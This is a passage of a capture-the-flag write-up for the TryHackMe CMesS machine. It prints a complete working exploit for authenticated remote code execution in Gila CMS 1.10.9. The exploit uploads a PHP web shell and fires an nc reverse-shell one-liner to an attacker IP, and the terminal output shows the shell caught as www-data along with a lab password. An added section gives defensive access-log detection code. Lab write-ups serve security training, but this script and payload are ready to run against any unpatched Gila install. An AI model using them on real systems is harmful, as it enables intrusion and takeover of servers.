RCE
┌──(kali㉿kali)-[~/archive/thm/cmess]
└─$ searchsploit -m php/webapps/51569.py ; mv 51569.py gila-1_10_9-rce.py
Exploit: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/51569
Path: /usr/share/exploitdb/exploits/php/webapps/51569.py
Codes: N/A
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/archive/thm/cmess/51569.py
The target Gila CMS instance (version 1.10.9) is affected by an authenticated RCE vulnerability (Exploit-DB 51569).
Exploit
# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05-07-2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/
# Version: Gila 1.10.9
# Tested on: Linux
import requests
from termcolor import colored
from urllib.parse import urlparse
# Print ASCII art
ascii_art = """
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝
by Unknown_Exploit
"""
print(colored(ascii_art, "green"))
# Prompt user for target URL
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")
# Extract domain from target URL
parsed_url = urlparse(target_url)
domain = parsed_url.netloc
target_url_2 = f"http://{domain}/"
# Prompt user for login credentials
username = input("Enter the email: ")
password = input("Enter the password: ")
# Create a session and perform login
session = requests.Session()
login_payload = {
    'action': 'login',
    'username': username,
    'password': password
}
response = session.post(target_url, data=login_payload)
cookie = response.cookies.get_dict()
var1 = cookie['PHPSESSID']
var2 = cookie['GSESSIONID']
# Prompt user for local IP and port
lhost = input("Enter the local IP (LHOST): ")
lport = input("Enter the local port (LPORT): ")
# Construct the payload
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"
# Perform file upload using POST request
upload_url = f"{target_url_2}fm/upload"
upload_headers = {
"Host": domain,
"Content-Length": "424",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
"Accept": "*/*",
"Origin": target_url_2,
"Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
"Connection": "close"
}
upload_data = f'''
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
Content-Type: application/x-php
<?php system($_GET["cmd"]);?>
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="path"
tmp
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="g_response"
content
------WebKitFormBoundarynKy5BIIJQcZC80i2--
'''
upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)
if upload_response.status_code == 200:
    print("File uploaded successfully.")
    # Execute payload
    response = session.get(payload_url)
    print("Payload executed successfully.")
else:
    print("Error uploading the file:", upload_response.text)
The RCE works via an authenticated file upload: after logging in, the script POSTs a PHP web shell (shell.php7, which runs system($_GET["cmd"])) to the file manager's /fm/upload endpoint with the path field set to tmp, then requests /tmp/shell.php7 with the command in the cmd query parameter.
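The upload-then-execute sequence the script relies on (POST to /fm/upload, then a GET to /tmp/shell.php7?cmd=...) is visible from the web server's side. The detection logic below is an added example, not part of the original writeup or of Gila CMS: the access-log lines are constructed, and the /tmp/ upload directory, the /fm/upload endpoint and the five-minute correlation window are assumptions. The extension rule deliberately covers the whole PHP-extension family, since the shell uploaded here was named shell.php7 rather than shell.php.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-format access-log lines (sample data, not from the page); the
# request sequence mirrors the exploit: login, POST /fm/upload, then GET /tmp/shell.php7?cmd=...
SAMPLE_LOG = """\
10.9.1.180 - - [05/Jul/2023:10:00:01 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.9.1.180 - - [05/Jul/2023:10:00:02 +0000] "POST /fm/upload HTTP/1.1" 200 58 "http://cmess.thm/admin/fm?f=tmp/.htaccess" "Mozilla/5.0"
10.9.1.180 - - [05/Jul/2023:10:00:03 +0000] "GET /tmp/shell.php7?cmd=id HTTP/1.1" 200 0 "-" "python-requests/2.31.0"
10.10.1.5 - - [05/Jul/2023:10:05:00 +0000] "GET /assets/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Cover the whole PHP-extension family, not only .php: the shell on this page was named shell.php7.
PHP_EXT_RE = re.compile(r'\.(?:php[3-8]?|phtml|phar)(?:$|\?)', re.IGNORECASE)
UPLOAD_DIRS = ("/tmp/",)          # assumption: the file manager stores uploads under the web root's tmp/
UPLOAD_ENDPOINT = "/fm/upload"    # upload endpoint used by the exploit

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def is_php_in_upload_dir(path):
    """True when a PHP-family script is requested from a directory that should only hold uploads."""
    return any(path.startswith(d) for d in UPLOAD_DIRS) and PHP_EXT_RE.search(path) is not None

def php_served_from_upload_dir(log_text):
    """Indicator 1: PHP executed from an upload directory. Returns (ip, path-without-query) pairs."""
    recs = (parse_line(l) for l in log_text.splitlines())
    return [(r["ip"], r["path"].split("?", 1)[0]) for r in recs if r and is_php_in_upload_dir(r["path"])]

def upload_then_execute(log_text, window=timedelta(minutes=5)):
    """Indicator 2 (higher confidence): same client POSTs to the upload endpoint, then within
    `window` requests a PHP-family file from an upload directory. Returns (ip, path, seconds)."""
    last_upload, hits = {}, []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0] == UPLOAD_ENDPOINT:
            last_upload[rec["ip"]] = rec["ts"]
        elif is_php_in_upload_dir(rec["path"]):
            prior = last_upload.get(rec["ip"])
            if prior is not None and rec["ts"] - prior <= window:
                hits.append((rec["ip"], rec["path"].split("?", 1)[0], int((rec["ts"] - prior).total_seconds())))
    return hits
```

Indicator 1 alone is a strong signal on a server whose upload directory should never serve scripts (and is best made structural by disabling PHP execution for that directory); indicator 2 ties the execution back to the upload that created it.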
Exploitation
┌──(kali㉿kali)-[~/archive/thm/cmess]
└─$ python3 gila-1_10_9-rce.py
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝
by Unknown_Exploit
Enter the target login URL (e.g., http://example.com/admin/): http://cmess.thm/admin/
Enter the email: andre@cmess.thm
Enter the password: KPFTN_f2yxe%
Enter the local IP (LHOST): 10.9.1.180
Enter the local port (LPORT): 9999
File uploaded successfully.
Executing the exploit script
┌──(kali㉿kali)-[~/archive/thm/cmess]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.1.180] from (UNKNOWN) [10.10.107.72] 44554
bash: cannot set terminal process group (717): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cmess:/var/www/html/tmp$ whoami
whoami
www-data
www-data@cmess:/var/www/html/tmp$ hostname
hostname
cmess
www-data@cmess:/var/www/html/tmp$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:f1:34:3a:89:8b brd ff:ff:ff:ff:ff:ff
inet 10.10.107.72/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::f1:34ff:fe3a:898b/64 scope link
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the www-data account via the RCE.